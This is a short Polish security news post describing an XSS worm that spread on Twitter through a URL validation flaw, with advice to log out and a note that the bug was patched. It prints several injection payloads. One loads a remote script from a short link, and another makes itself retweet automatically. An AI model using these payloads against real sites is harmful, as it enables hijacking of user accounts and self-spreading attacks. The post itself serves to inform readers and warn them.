Niebezpiecznik

Jeśli chcecie zdobyć milion “followersów” musicie się śpieszyć ;-) Dzięki prostemu XSS-owi na Twitterze grasuje sobie właśnie robak. Ze względów bezpieczeństwa sugerujemy wylogowanie się z Twittera i korzystanie z “nieprzeglądarkowych” klientów do tego serwisu.

Robak na Twitterze

Bug został znaleziony przez użytkownika judofyr, który w demonstrującym atak “twitnięciu” umieścił instrukcję podmieniającą tło pod linkami na kolor czarny. Kolejne osoby dodały do tego hm… “exploita” (?) zdarzenie onmouseover wymuszające retwittowanie kodu i przekierowujące użytkowników na strony pornograficzne.

XSS w Twitterze

Kod “exploita”:
http://judofyr.net/@"style="background:#000;color:#000;/
Atak wykorzustuje błąd walidowania adresu URL w Twitterze. Cokolwiek, co znajduje się za “@” zostanie dołączone do URL w dodawanych na Twittera wpisach.

Po lekkich modyfikacjach, “payload” tego “exploita” może stać się groźniejszy:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ....
lub zacznie się sam rozprzestrzeniać:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Wyłączenie JavaScriptu podczas korzystania z Twittera, wylogowanie się z serwisu, skorzystanie z innych niż przeglądarka klientów jest obecnie całkiem dobrym pomysłem…

Aktualizacja 16:09
Błąd jest już załatany — kto się pobawił, to się pobawił. Przeszukajcie sobie Twittera pod kątem “onmouseover” aby poznać skalę robaka ;-)

Przeczytaj także:

• Persistent XSS na Twitterze
• XSS w Google Calendar i Twitterze
• XSSer — sprawdź czy twoja strona jest podatna na XSS